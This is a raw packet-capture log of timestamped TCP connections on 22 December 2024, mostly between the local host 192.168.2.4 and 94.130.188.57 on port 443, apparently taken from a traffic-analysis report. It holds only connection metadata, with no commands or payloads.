                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062655926 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062690973 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062720060 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062736034 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062783957 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:00.062810898 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.072798967 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.072892904 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.073285103 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.073291063 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.074806929 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.074811935 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.799712896 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.799791098 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.799792051 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.799880028 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.800627947 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:01.800667048 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.113285065 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.113346100 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.113354921 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.113399982 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.114744902 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.114763021 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.749249935 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.749373913 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.749526024 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.749936104 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:02.750016928 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:03.741830111 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:03.741915941 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:03.742000103 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:03.742398024 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:03.742453098 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.165219069 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.165457964 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.165958881 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.166011095 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.167690992 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.167707920 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.167804003 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.167833090 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.167968035 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168041945 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168188095 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168395996 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168528080 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168566942 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168570995 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168595076 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168643951 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168664932 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168697119 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168730021 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168734074 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168754101 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152179003 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152275085 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152735949 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152787924 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154311895 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154372931 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154464006 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154498100 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.177622080 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.177716017 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.178051949 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.178119898 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912579060 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912652969 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912668943 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912730932 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.913634062 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.913729906 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670078039 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670238972 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670315027 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670315027 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.671046972 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.671130896 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.789947033 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.789982080 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.790071011 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.790416956 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.790429115 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828161001 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828207016 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828274012 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828572989 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828589916 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.880616903 CET4972480192.168.2.42.20.68.210
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.001171112 CET80497242.20.68.210192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.001396894 CET4972480192.168.2.42.20.68.210
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199373960 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199435949 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199812889 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199817896 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201453924 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201457977 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201543093 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201559067 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201627970 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201649904 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201742887 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201836109 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201905966 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201919079 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201973915 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201994896 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202049971 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202203035 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202240944 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202310085 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202361107 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202393055 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202410936 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202419996 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202476025 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202491999 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.231734037 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.231817007 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.232214928 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.232223988 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.233927011 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.233932972 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234025955 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234039068 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234108925 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234122038 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234136105 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234142065 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234188080 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234199047 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234256029 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234309912 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234325886 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234513044 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234623909 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234637022 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234652996 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234659910 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234669924 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234678030 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234689951 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234693050 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234714031 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234827042 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234833956 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234863043 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234884024 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234899044 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234920025 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234920979 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234945059 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234968901 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234968901 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234991074 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235033989 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235053062 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235071898 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235074997 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235119104 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235126972 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235135078 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235151052 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235171080 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235171080 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235183954 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.235255957 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.476697922 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.989890099 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.989953041 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.989969969 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.990010023 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.990063906 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.990115881 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.991029024 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.991039991 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:10.852071047 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:10.852155924 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:10.852330923 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:10.852608919 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:10.852636099 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:11.350436926 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:11.350603104 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:11.350641966 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:11.350672007 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:11.351443052 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:11.351459026 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.002567053 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.002599955 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.002695084 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.002881050 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.002890110 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.252547026 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.252649069 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.253120899 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.253195047 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.254945993 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.254945993 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255008936 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255074978 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255101919 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255116940 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255191088 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255212069 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255228996 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255240917 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255364895 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255460024 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255656958 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255709887 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255745888 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255789042 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255820036 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:12.255880117 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.411600113 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.411690950 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.412134886 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.412143946 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413728952 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413733959 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413800955 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413815022 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413886070 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413898945 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413912058 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413918018 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.413984060 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414009094 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414031982 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414083958 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414244890 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414258957 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414310932 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414349079 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414438009 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414485931 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414520025 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414580107 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414603949 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414619923 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414771080 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414802074 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414814949 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414875984 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414899111 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414930105 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414977074 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414978981 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415004969 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415023088 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415071964 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415111065 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415117979 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415153027 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415163040 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415206909 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415222883 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415256023 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415271044 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415290117 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415349007 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415381908 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415424109 CET49811443192.168.2.494.130.188.57
